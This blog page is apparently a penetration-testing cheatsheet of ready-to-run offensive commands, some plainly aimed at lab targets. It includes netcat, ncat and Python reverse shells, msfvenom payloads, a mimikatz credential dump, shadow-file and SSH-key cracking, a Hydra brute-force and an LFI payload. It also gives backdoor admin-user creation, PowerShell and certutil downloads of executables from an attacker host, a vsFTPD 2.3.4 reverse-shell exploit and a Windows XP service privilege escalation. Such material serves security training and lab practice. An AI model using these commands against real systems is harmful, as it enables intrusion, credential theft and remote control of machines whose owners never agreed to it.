Blog
Blog
Blog
Blog
Welcome to egonzalez blog
Hacking
Index
Hack the box writeups
Python Vulnerabilities
Hacking cheatsheet
OpenStack
Index
Docker and DevOps
Index
Powered by GitBook

Hacking cheatsheet

Hacking command list

Netcat

Connect to port

nc -nv 192.168.1.10 110

Bind port and connect to:

nc -nlvp 4444
nc -nv 192.168.1.10 4444

Copy files

nc -nlvp 4444 > dest-file
nc -nv 192.168.1.10 4444 < local-file

Bind shell and remote execution

nc -nlvp 4444 -e cmd.exe
nc -nv 192.168.1.10 4444

Reverse shell

nc -nlvp 4444
nc -nv 192.168.1.10 4444 -e /bin/bash

Scan ports

nc -nvv -w 1 -z 192.168.1.10 3388-3390

Ncat

Bind shell SSL with allow IP address

ncat --exec cmd.exe --allow 192.168.1.11 -vnl 4444 --ssl
ncat -v 192.168.1.10 4444 --ssl

Reverse shell SSL

ncat -vnl 4444 --ssl
ncat -nv 192.168.1.10 4444 --ssl --exec /bin/bash

Tcpdump

Load a .pcap file

tcpdump -r file.pcap

Filter by source host

tcpdump -n src host 172.16.40.10

Filter by destination host

tcpdump -n dst host 172.16.40.10

Filter by port

tcpdump -n port 80

Print packet data in HEX and ASCI

tcpdump -nXX

Packets with ACK or PSH flags set

tcpdump -A -n 'tcp[13] = 24'

Print HEX data on an 1500 MTU card

tcpdump -i tap0 -nXX -s 1500 port 110

The harvester

Search all sources for email

theharvester -d domain.com -b all

Search employees on linkedin

theharvester -d domain.com -b linkedin

Search emails and query hosts in shodan

theharvester -d domain.com -b bing -h

host

Find name servers

host -t ns domain.com

Find mail servers

host -t mx domain.com

Find address and mail servers

host domain.com

Reverse lookup

host 1.2.3.4

Transfer DNS zone

host -l domain.com domain-nameserver.com

Try all NS DNS zone transfer

HOST=host.com; for ns in $(host -t ns $HOST | awk '{print $4}'); do host -l $HOST $ns | grep "has address" ; done

dnsrecon

Try DNS zone transfer

dnsrecon -d domain.com -t axfr

dnsenum

Enumerate host in a domain

dnsenum domain.com

Nmap

TCP syn/ack scan

nmap -sT 10.11.11.123

Scan all ports

nmap -sS 1.1.1.1 -p-

Identify host in the network (ICMP)

nmap -sn -v 10.11.1.1-254 -oG host.txt

Scan port 80 on all hosts

nmap -p 80 10.11.1.1-254 -oG web-host.txt

OS, port, version, traceroute and script scan of top 20 port in a range

nmap -sT -A -top-ports=20 10.11.1.1-254 -oG top-ports.txt

OS scan

nmap -O 10.11.11.123

Service Version scan

nmap -sV -sT 10.11.11.123

Script discover nsb and host version

nmap 10.11.11.123 -p 139,445 --script smb-os-discovery.nse

Script DNS zone transfer

nmap --script dns-zone-transfer -p 53 ns2.domain.com

Scan for smb services (139-netbios,445-microsoft-ds)

nmap -v -p 139,445 -oG smb.txt 10.11.1.1-254

Enum http path

nmap -v -p 80 192.168.56.101 --script http-enum.ns

SMB

Discover SMB hosts in a network, get IP, NetBIOS name and users

nbtscan -r 10.11.1.0/24

Discover SMB host info

enum4linux -a 10.11.1.227

Search specific vulnerability

nmap -v -p139,445 --script smb-vuln-ms08-067 --script-args=unsafe=1 10.13.10.4

Enumerate shares

nmap --script smb-enum-shares 10.13.10.4 -p139,445 -T4

Map smb shares

smbmap -H 10.14.15.16 -u guest

Mount share

mount -t cifs -o vers=1.0,username=guest,password="" //10.11.12.13/wwwroot /tmp/path

SMTP

Connect smtp

nc -nv 192.168.56.101 25
# Check if user exists
VRFY root

SNMP

  • Port: 161

  • Type: UDP

Scan strings [community, public, manager, etc]

onesixtyone -c snmp_strings.txt 127.0.0.1

Enumerate MIB tree

snmpwalk -c public -v1 127.0.0.1

Enumerate some SMTP OID

snmpwalk -c <COMMUNITY_STRING> <version> <HOST> <OID>

msfvenom

PHP reverse shell

msfvenom -p php/reverse_php LHOST=10.11.0.49 LPORT=443 -f raw > shell.php

Windows bind port (No firewall enabled)

msfvenom -p windows/shell_bind_tcp R LPORT=4446 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

Microsoft ASP .net reverse shell

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.49 LPORT=4445 -f asp > shell.asp

Create windows executable

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.49 LPORT=8080 -f exe -e x86/shikata_ga_nai -i 9 -o httpd.exe

GCC / compilation

Regular compilation

gcc -o OpenFuck 47080.c -lcrypto

Cross compile x86 in x86_64 host

gcc -Wall -o <out_file> <exploit.c> -m32 -march=i686 -Wl,--hash-style=both
gcc -m32 -Wl,--hash-style=both -o udev udev.c

Nikto

Analise web with default settings

nikto -host http://10.11.1.10

dirb

Scan web service directories and files

dirb http://192.168.1.10

Scan non recursively, non show attempts and bigger words list

dirb http://192.168.1.10 /usr/share/dirb/wordlists/big.txt -r -S

FTP

Non interactive FTP download from windows

echo open 10.11.0.49 21 > ftp.txt
echo USER xnaaro >> ftp.txt
echo 12345>> ftp.txt
echo bin >> ftp.txt
echo GET wget.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt

Mimikatz

Non interactive hash dump

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit

Webserver

Create a python webserver

python -m SimpleHTTPServer 80

NoSQLmap

python nosqlmap.py --attack 2 --victim host.name --webPort 80 --uri / --httpMethod POST --postData username,test_user,password,test_password,login,login --injectedParameter 3 --injectSize 4 --injectFormat 2 --savePath output.log --verb ON

NoSQl user/pass enum

# Git repository: https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
python3 nosqli_enumeration.py -u http://localhost/index.php -up email -pp password -ep password -m POST

Searchsploit

Search exploit

searchsploit <name>

See exploit code

searchsploit -x /path/exploit

Copy exploit current location

searchsploit -m path/exploit

John the ripper

Merge passwd and shadow files

unshadow /etc/passwd /etc/shadow > unshadow.txt

Crack passwords

john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadow_pass.txt

Crack SSH key passphrase

/usr/share/john/ssh2john.py id_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash

Mutate cewl dictionary

john --wordlist=cewl_words.txt --rules --stdout > mutated_words

hashcat

Crack linux passwords

hashcat -m 1800 -O passwd.hash /usr/share/wordlists/rockyou.txt --force

File inclusion

LFI example

http://10.12.13.14/classes/phpmailer/class.cs_phpmailer.php?classes_dir=/etc/passwd%00

Shells

Python interactive bash shell

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm && export SHELL=bash

Scape restricted shell: -rbash: /usr/bin/python: restricted: cannot specify '/' in command names

BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

Python reverse shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.49",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Mysql

Non interactive queries

mysql -u <user> -p<passwd> -D otrs -e "show databases;"

Robots.txt

Crawl robots txt as a search engine agent

curl --user-agent Googlebot http://10.11.12.13/robots.txt -v

Hydra

Generate passwds from web words

cewl http://10.11.12.13 -m 2 -w output

Brute force logging

hydra -L usernames.txt -P passwords.txt <IP>  <MODE> "<PATH>:Action=<HTTP_QUERY>&User=^USER^&Password=^PASS^:<ERROR message when fail"
# Example
hydra -L usernames -P output 10.11.12.13  http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=300&User=^USER^&Password=^PASS^:F=Login"

Fuzzing

ffuz

Silent fuzzing

ffuf -s -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.168:8080/FUZZ

Whatweb

$ whatweb http://10.10.10.168:8080   
http://10.10.10.168:8080 [200 OK] Country[RESERVED][ZZ], Email[[email protected]], HTML5, HTTPServer[BadHTTPServer], IP[10.10.10.168], JQuery, Script, Title[0bscura], X-UA-Compatible[IE=Edge]
​

Windows commands

Create admin user with RDP

net user xnaaro 12345 /add
net localgroup administrators xnaaro /add
net localgroup "Remote Desktop Users" xnaaro /add

Quick local enumeration

echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: &  type "C:\Documents and Settings\Administrator\Desktop\proof.txt"

Downloads

Download file with powershell

  • Option 1

echo (New-Object System.Net.WebClient).DownloadFile("http://10.11.0.49/wget.exe", "wget.exe") > wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

  • Option 2

PowerShell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile (New-Object System.Net.WebClient).DownloadFile('http://10.11.0.49/wget.exe','wget.exe')

Non interactive download

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.49/wget.exe" >>wget.ps1
echo $file = "wget.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
​
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Download file with certutil

certutil -urlcache -split -f "http://10.11.0.49/wget.exe" wget.exe

Windows exploit suggester

Copy systeminfo to local host

./windows-exploit-suggester.py --database 2019-11-29-mssb.xls --systeminfo /tmp/systeminfo

Well know exploits

Common vulnerabilities

vsFTPD 2.3.4

Exploit and reverse shell

python3 vsftpd_234_exploit.py 192.168.56.101 21 "sh -c 'nc -nv 192.168.56.1 44444 -e /bin/bash > /dev/null 2>&1 &'"

Windows XP SP1 priv escalation

sc config upnphost binpath= "C:\Inetpub\Scripts\nc.exe 10.11.0.49 10000 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
Previous
YAML
Next - OpenStack
Index
Last updated 1 year ago
Contents
Netcat
Ncat
Tcpdump
The harvester
host
dnsrecon
dnsenum
Nmap
SMB
SMTP
SNMP
msfvenom
GCC / compilation
Nikto
dirb
FTP
Mimikatz
Webserver
NoSQLmap
NoSQl user/pass enum
Searchsploit
John the ripper
hashcat
File inclusion
Shells
Mysql
Robots.txt
Hydra
Fuzzing
ffuz
Whatweb
Windows commands
Downloads
Windows exploit suggester
Well know exploits
Common vulnerabilities
vsFTPD 2.3.4
Windows XP SP1 priv escalation